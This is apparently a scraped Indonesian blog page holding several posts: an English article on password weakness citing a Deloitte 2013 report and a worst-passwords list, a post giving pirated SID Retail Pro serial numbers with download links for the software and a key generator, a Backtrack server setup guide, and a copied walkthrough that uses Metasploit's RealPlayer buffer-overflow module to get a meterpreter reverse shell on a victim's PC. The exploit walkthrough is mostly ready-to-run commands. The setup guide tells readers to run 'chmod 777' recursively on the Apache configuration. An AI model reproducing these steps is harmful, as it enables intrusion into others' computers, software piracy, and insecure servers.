The use of password in a technological

Every day we read about an incredible number of successful attacks and data breaches that exploited leak of authentication mechanisms practically in every sector. Often also critical control system are exposed on line protected only by a weak password, in many cases the default one of factory settings, wrong behavior related to the human component and absence of input validation makes many applications vulnerable to external attacks.

Today I desire to focus the attention of a report published by the consulting firm's Deloitte titled “Technology, Media & Telecommunications Predictions 2013” that provide a series of technology predictions, including the outlook for subscription TV services and enterprise social networks. The document correctly express great concern of the improper use of passwords that will continue also in 2013 being causes of many problems, it must to be considered that value of the information protected by passwords continues to grow attracting ill-intentioned.

 

The report focuses the need to reconsider password management processes in the light of technological contexts that we will before Duncan Stewart, Director of TMT Research, declared: "Passwords containing at least eight characters, one number, mixed-case letters and non-alphanumeric symbols were once believed to be robust,” “But these can be easily cracked with the emergence of advance hardware and software.”

“Moving to longer passwords or to truly random passwords is unlikely to work, since people just won't use them,” Stewart said.

“An eight character password chosen from all 94 characters available on a standard keyboard33 is one of 6.1 quadrillion34 (6,095,689,385,410,816) possible combinations. It would take about a year for a relatively fast 2011 desktop computer to try every variation. Even gaining access to a credit card would not be worth the computing time. However, a number of factors, related to human behavior and changes in technology, have combined to render the ‘strong’ password vulnerable.”

Using a brute force attack for an 8‑character password with a dedicated password‑cracking machine employing readily available visualization software and high‑powered graphics processing units is possible to discover the password in only 5.5 hours. The cost of such machine is about $30,000 today but as explained in the reports hackers could obtained same computational capabilities from huge botnet.

Not only password length concerns the researchers, also the human factor could expose password management process to serious risks, for example humans never remind long and complex credentials, they tend to adopt password easy to remember and related to their life experience, in many cases the password is re-used and in the time across different services, from movie on line store to banking account. The average user has 26 password‑protected accounts, but only five different passwords across those accounts. According a recent study of six million actual user generated passwords, the 10,000 most common passwords would have accessed 98.1 percent of all accounts, an information that gives us an idea of how much vulnerable the password management process.

“Once a hacker has a password, he or she can potentially have the keys to the cyber kingdom based on most consumers’ behavior.”

Deloitte Deloitte predicts that in 2013 more than 90% of user generated passwords, even those considered strong by IT departments, will be vulnerable to hacking with serious consequences, the company predict in fact billions of dollars of losses, declining confidence in Internet transactions and significant damage to the company reputations for the victims of attacks. 

The reports states:

“How do passwords get hacked? The problem is not that a hacker discovers a username, goes to a login page and attempts to guess the password. That wouldn’t work: most web sites freeze an account after a limited number of unsuccessful attempts, not nearly enough to guess even the weakest password. Most organizations keep usernames and passwords in a master file. That file is hashed: a piece of software encrypts both the username and password together. Nobody in the organization can see a password in its unencrypted form. When there is an attempt to log in, the web site hashes the login attempt in real time and determines if the hashed result matches the one stored in the database for that username. So far, so secure. However, master files are often stolen or leaked. A hashed file is not immediately useful to a hacker, but various kinds of software and hardware, discussed in this Prediction, can decrypt the master file and at least some of the usernames and passwords. Decrypted files are then sold, shared or exploited by hackers.”

As described another problem is related to use of passwords on various platforms, let’s consider that the average user takes 4-5 seconds to type a strong ten character password on a PC keyboard, time increases to 7-10 seconds on a mobile devices with a keyboard and to 7-30 seconds on touchscreen devices. As consequence a quarter of the people surveyed admitted to using less secure passwords on mobile devices to save time.

SplashData, which develops password management applications, reveals its Annual “25 Worst Passwords of the Year” enumerating the list of most common password chosen by users.

The three worst passwords haven’t changed respect previous year, they’re “password”, “123456” and “12345678” and new passwords have been introduced in the top list such as “welcome”, “jesus” and “ninja”.

Following the top ten list:

1. password (unchanged)
2. 123456 (unchanged)
3. 12345678 (unchanged)
4. abc123 (up 1)
5. qwerty (down 1)
6. monkey (unchanged)
7. letmein (up 1)
8. dragon (up 2)
9. 111111 (up 3)
10. baseball (up 1)

Have you ever used one of the most popular passwords of 2012 for your own personal accounts? Change it. What could improve password management, SSO systems for represent a good solution to do it for example allowing in simplest way the use of long or random passwords respecting the elementary best practices for password management, of course also this system must be protected from hacking attacks.

The implementation of multifactor authentication processes token based (both software and hardware) represents the best compromise between costs and security, that is also the way that security IT security travels in the future.

 

SUMBER

Read More

SID Retail Pro

Mau sharing tentang aplikasi SID Retail nih. Tulisan dibawah ini saya copas dari beberapa sumber di dunia maya. Semoga bisa bermanfaat dan mohon maaf sebelumnya. 


SN 4690 : N605MCP-7WYND34-MFQ1V21-7328Z18
SN 4876 : 897FXJ5-97H296F-30O6G7S-05ZGRGT
SN 10816 :  9G7YZ93-9SJ784D-A30F56P-40HP3FL
SN 6277 : 497C8R1-W6J0L53-W39XU5B-57WU1X3
SN 7469 : U786F66-29UVS5H-6X42D9Q-8853GXO



Download SID Retail Pro :
https://mega.co.nz/#!V0ZlUYKY!Ie8M3lASF8pZQQD2JQkZgk5xSjxhd1v7F1PvnmezHwg
(14.4 MB)

Download Generate SN :
https://mega.co.nz/#!hx4yybCY!Yg-vFHk9sdj-zdW--x4La2IpXs85I15aqpIZ794IQSI
(608 KB)

Read More

Cara Mengaktifkan PhpMyadmin dan MySQL Di Bactrack

Selamat pagi dunia maya !!! Apa kabarnya semua, semoga semuanya sehat selalu dan happy.

Di posting kali ini saya ingin membahas bagaimana cara mengaktifkan MySQL dan Phpmyadmin pada Backtrack. Trik ini saya gunakan pada OS Backtrack 5 R3.

Buka console dan ketikkan perintah seperti dibawah ini :

--BIND
apt-get install bind9 bind9-doc

--Apache2
apt-get install apache2 apache2-mpm-prefork apache2-utils apache2.2-common libapache2-mod-php5 libapr1 libaprutil1 libdbd-mysql-perl libdbi-perl libnet-daemon-perl libplrpc-perl libpq5 libapache2-mod-auth-mysql

--MYSQL
apt-get install mysql-client mysql-common mysql-server

--PHP
apt-get install php5 php5-common php5-mysql php5-imap php-pear php5-xmlrpc php5-gd php5-cli

#PHPMyAdmin
apt-get install phpmyadmin

#VsFTPd
apt-get install vsftpd

#postfix
apt-get install postfix postfix-doc postfix-mysql postfix-tls libsasl2-2 libsasl2-modules libsasl2-modules-sql openssl

#courier
apt-get install courier-authdaemon courier-authlib-mysql courier-imap courier-imap-ssl courier-pop courier-pop-ssl

Kemudian jika sudah didownload perintah diatas atau bisa melalui "synaptic package manager" dan search perintah untuk software MySQL, Phpmyadmin, dst. Kemudian centang2 dan apply deh, tapi pastikan koneksi internet anda lancar yah. Jangan lupa di restart yah klo sudah done.

Selanjutnya jika ingin test apakah mysql kita bisa konek atau tidak, maka ikuti perintah dibawah ini :

#Cara mengaktifkan servicenya :
/etc/init.d/mysql start

#Kemudian atur konfigurasi :
mysql_secure_installation

#Jika sudah selesai mengatur perintah kedua, maka jalankan mysql tersebut :
mysql -u root -p

Jika sudah sukses perintah2 diatas, maka kita coba aktifkan PhpMyadmin dengan cara sebagai berikut :

#Aktifkan permission folder :

chmod 777 -R /etc/apache2/

Cek apakah berhasil merubah chmod tersebut dengan mengetikkan :

nano /etc/apache2/apache2.conf

Kemudian tambahkan perintah :

include /etc/phpmyadmin/apache.conf

Tekan CTRL X dan simpan plus overwrite file tersebut. Selanjutnya restart service apache dengan cara :

/etc/init.d/apache2 restart

Terakhir adalah dengan membuka browser kesayangan anda pada OS Backtrack (klo saya buka mozilla). Kemudian ketikkan url 

http://localhost/phpmyadmin

Apakah sudah bisa dibuka teman2 phpmyadmin anda ??? Selamat bagi yang sukses yah. Semoga tutorial singkat diatas dapat berguna bagi para pembaca blog ini.

Thanks

Read More

Hack Remote Windows PC using Real player RealMedia File Handling Buffer Overflow

This module exploits a stack based buffer overflow on RealPlayer <=15.0.6.14. The vulnerability exists in the handling of real media files, due to the insecure usage of the Get Private Profile String function to retrieve the URL property from an Internet Shortcut section. This module generates a malicious rm file which must be opened with RealPlayer via drag and drop or double click methods. It has been tested successfully on Windows XP SP3 with RealPlayer 15.0.5.109.

Exploit Targets

Real Player 15.0.5.109

Requirement

Attacker: Backtrack 5

Victim PC: Windows XP

Open backtrack terminal type msfconsole

+

Now type use exploit/windows/fileformat/real_player_url_property_bof

msf exploit (real_player_url_property_bof)>set payload windows/meterpreter/reverse_tcp

msf exploit (real_player_url_property_bof)>set lhost 192.168.1.3 (IP of Local Host)

msf exploit (real_player_url_property_bof)>exploit

After we successfully generate the malicious rm File, it will stored on your local computer

/root/.msf4/local/msf.rm

Now we need to set up a listener to handle reverse connection sent by victim when the exploit successfully executed.

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.1.3

exploit

Now send your msf.rm files to victim, as soon as they download and open it. Now you can access meterpreter shell on victim computer.

 

Sumber : http://www.hackingarticles.in/hack-remote-windows-pc-using-real-player-realmedia-file-handling-buffer-overflow/

Read More

Backtrack 5 (Lokal)

Bagi teman2 yang ingin mendownload iso Backtrack 5 R1 atau R3 dengan koneksi link lokal, ini saya kasih link dari kambing ui dan silahkan disedot gan :

R3 32Bit : http://kambing.ui.ac.id/iso/backtrack/BT5R3-GNOME-32.iso
Versi 64bit : http://kambing.ui.ac.id/iso/backtrack/BT5-GNOME-64.iso

Backtrack 4 : http://kambing.ui.ac.id/iso/backtrack/bt4-r2.iso

Read More

Internet Explorer 6, 7 and 8 Vulnerable

Last Friday, we reported that the website of the U.S. Council of Foreign Relations was allegedly compromised by Chinese hackers who exploited the zero-day bug that was only discovered that same day. The CFR website was compromised with JavaScript that served malicious code to older IE browsers and the code then created a heap-spray attack using Adobe Flash Player.

Yesterday former hacker Bryce Case Jr (YTCracker) tweeted about a new zero day exploit threatening all users of IE8, "internet explorer 6-8 0day making the rounds force them toolbar installs and keyloggers on exgf while you still can...".

 

On Saturday, Microsoft published a security advisory warning users of Internet Explorer 6, 7, and 8 that they could be vulnerable to remote code execution hacks. The vulnerability is a remote code execution vulnerability that exists in the way that Internet Explorer accesses an object in memory that has been deleted or has not been properly allocated.

The vulnerability may corrupt memory in a way that could allow an attacker to execute arbitrary code in the context of the current user within Internet Explorer. An attacker could host a specially crafted website that is designed to exploit this vulnerability through Internet Explorer and then convince a user to view the website.

Meanwhile, the software giant will be shipping a software fix, available from its Fix It Solution Center, to protect systems before the patch is ready. Microsoft also has posted several mitigation options for users of Internet Explorer 8 or earlier to protect the Windows operating system from the exploit.

The best measure - of course,  switch to Google Chrome and Mozilla Firefox.

 

Sumbernya : thehackernews.com/2012/12/internet-explorer-6-7-and-8-vulnerable.html

 

Read More